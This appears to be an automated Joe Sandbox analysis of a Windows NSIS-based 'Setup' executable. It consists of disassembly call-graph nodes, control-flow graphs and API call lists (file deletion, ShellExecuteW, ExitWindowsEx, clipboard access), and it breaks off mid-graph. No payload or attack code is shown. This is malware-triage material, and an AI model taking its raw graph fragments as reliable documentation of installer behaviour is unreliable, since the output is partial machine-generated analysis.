4009 405eff 3 API calls 4006->4009 4008 4067aa 18 API calls 4007->4008 4010 405aa2 4008->4010 4011 405a38 4009->4011 4012 405ab2 4010->4012 4013 406831 18 API calls 4010->4013 4011->4007 4015 405a5b lstrlenW 4011->4015 4018 405d32 CharNextW 4011->4018 4014 405ad2 LoadImageW 4012->4014 4114 403ea0 4012->4114 4013->4012 4016 405b92 4014->4016 4017 405afd RegisterClassW 4014->4017 4019 405a69 lstrcmpiW 4015->4019 4020 405a8f 4015->4020 4024 40141d 80 API calls 4016->4024 4022 405b9c 4017->4022 4023 405b45 SystemParametersInfoW CreateWindowExW 4017->4023 4025 405a56 4018->4025 4019->4020 4026 405a79 GetFileAttributesW 4019->4026 4028 40674e 3 API calls 4020->4028 4022->3909 4023->4016 4029 405b98 4024->4029 4025->4015 4030 405a85 4026->4030 4027 405ac8 4027->4014 4031 405a95 4028->4031 4029->4022 4032 403ec1 19 API calls 4029->4032 4030->4020 4033 40677d 2 API calls 4030->4033 4113 406035 lstrcpynW 4031->4113 4035 405ba9 4032->4035 4033->4020 4036 405bb5 ShowWindow LoadLibraryW 4035->4036 4037 405c38 4035->4037 4038 405bd4 LoadLibraryW 4036->4038 4039 405bdb GetClassInfoW 4036->4039 4040 405073 83 API calls 4037->4040 4038->4039 4041 405c05 DialogBoxParamW 4039->4041 4042 405bef GetClassInfoW RegisterClassW 4039->4042 4043 405c3e 4040->4043 4046 40141d 80 API calls 4041->4046 4042->4041 4044 405c42 4043->4044 4045 405c5a 4043->4045 4044->4022 4048 40141d 80 API calls 4044->4048 4047 40141d 80 API calls 4045->4047 4046->4022 4047->4022 4048->4022 4050 40389d 4049->4050 4051 40388f CloseHandle 4049->4051 4121 403caf 4050->4121 4051->4050 4056->3891 4174 406035 lstrcpynW 4057->4174 4059 4067bb 4060 405d85 4 API calls 4059->4060 4061 4067c1 4060->4061 4062 406064 5 API calls 4061->4062 4069 403ac3 4061->4069 4065 4067d1 4062->4065 4063 406809 lstrlenW 4064 406810 4063->4064 4063->4065 4067 40674e 3 API calls 4064->4067 4065->4063 4066 406301 2 API calls 4065->4066 4065->4069 4070 40677d 2 API calls 4065->4070 4066->4065 4068 406816 GetFileAttributesW 4067->4068 4068->4069 4069->3902 4071 406035 lstrcpynW 4069->4071 4070->4063 4071->3935 4072->3940 4073->3924 4074->3932 4075->3951 4077 405ca6 4076->4077 4078 405c9a CloseHandle 4076->4078 4077->3951 4078->4077 4079->3966 4080->3968 4082 40678c 4081->4082 4083 406792 CharPrevW 4082->4083 4084 40361f 4082->4084 4083->4082 4083->4084 4085 406035 lstrcpynW 4084->4085 4085->3972 4087 4032f3 4086->4087 4088 4032db 4086->4088 4091 403303 GetTickCount 4087->4091 4092 4032fb 4087->4092 4089 4032e4 DestroyWindow 4088->4089 4090 4032eb 4088->4090 4089->4090 4090->3975 4094 403311 CreateDialogParamW ShowWindow 4091->4094 4095 403334 4091->4095 4099 40635e 4092->4099 4094->4095 4095->3975 4097->3981 4098->3982 4100 40637b PeekMessageW 4099->4100 4101 406371 DispatchMessageW 4100->4101 4102 403301 4100->4102 4101->4100 4102->3975 4104 403ed5 4103->4104 4119 405f7d wsprintfW 4104->4119 4106 403f49 4107 406831 18 API calls 4106->4107 4108 403f55 SetWindowTextW 4107->4108 4109 403f70 4108->4109 4110 403f8b 4109->4110 4111 406831 18 API calls 4109->4111 4110->4005 4111->4109 4112->4001 4113->4007 4120 406035 lstrcpynW 4114->4120 4116 403eb4 4117 40674e 3 API calls 4116->4117 4118 403eba lstrcatW 4117->4118 4118->4027 4119->4106 4120->4116 4122 403cbd 4121->4122 4123 4038a2 4122->4123 4124 403cc2 FreeLibrary GlobalFree 4122->4124 4125 406cc7 4123->4125 4124->4123 4124->4124 4126 4067aa 18 API calls 4125->4126 4127 406cda 4126->4127 4128 406ce3 DeleteFileW 4127->4128 4129 406cfa 4127->4129 4168 4038ae CoUninitialize 4128->4168 4130 406e77 4129->4130 4172 406035 lstrcpynW 4129->4172 4136 406301 2 API calls 4130->4136 4156 406e84 4130->4156 4130->4168 4132 406d25 4133 406d39 4132->4133 4134 406d2f lstrcatW 4132->4134 4137 40677d 2 API calls 4133->4137 4135 406d3f 4134->4135 4139 406d4f lstrcatW 4135->4139 4141 406d57 lstrlenW FindFirstFileW 4135->4141 4138 406e90 4136->4138 4137->4135 4142 40674e 3 API calls 4138->4142 4138->4168 4139->4141 4140 4062cf 11 API calls 4140->4168 4145 406e67 4141->4145 4169 406d7e 4141->4169 4143 406e9a 4142->4143 4146 4062cf 11 API calls 4143->4146 4144 405d32 CharNextW 4144->4169 4145->4130 4147 406ea5 4146->4147 4148 405e5c 2 API calls 4147->4148 4149 406ead RemoveDirectoryW 4148->4149 4153 406ef0 4149->4153 4154 406eb9 4149->4154 4150 406e44 FindNextFileW 4152 406e5c FindClose 4150->4152 4150->4169 4152->4145 4155 404f9e 25 API calls 4153->4155 4154->4156 4157 406ebf 4154->4157 4155->4168 4156->4140 4159 4062cf 11 API calls 4157->4159 4158 4062cf 11 API calls 4158->4169 4160 406ec9 4159->4160 4163 404f9e 25 API calls 4160->4163 4161 406cc7 72 API calls 4161->4169 4162 405e5c 2 API calls 4164 406dfa DeleteFileW 4162->4164 4165 406ed3 4163->4165 4164->4169 4166 406c94 42 API calls 4165->4166 4166->4168 4167 404f9e 25 API calls 4167->4150 4168->3910 4168->3911 4169->4144 4169->4150 4169->4158 4169->4161 4169->4162 4169->4167 4170 404f9e 25 API calls 4169->4170 4171 406c94 42 API calls 4169->4171 4173 406035 lstrcpynW 4169->4173 4170->4169 4171->4169 4172->4132 4173->4169 4174->4059 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                        • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                          • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                        • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                        • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                        • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                        • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                        • String ID: New install of "%s" to "%s"${
                                                                                                                                        • API String ID: 2110491804-1641061399
                                                                                                                                        • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                        • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                        • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                        • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                        APIs
                                                                                                                                        • #17.COMCTL32 ref: 004038CE
                                                                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                        • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                        • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                        • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                        • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                        • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                        • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                        • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                        • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                        • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                        • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                        • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                        • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                        • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                        • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                        • API String ID: 2435955865-3712954417
                                                                                                                                        • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                        • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                        • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                        • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 790 406301-406315 FindFirstFileW 791 406322 790->791 792 406317-406320 FindClose 790->792 793 406324-406325 791->793 792->793
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                        • String ID: jF
                                                                                                                                        • API String ID: 2295610775-3349280890
                                                                                                                                        • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                        • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                        • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                        • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 310444273-0
                                                                                                                                        • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                        • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                        • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                        • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 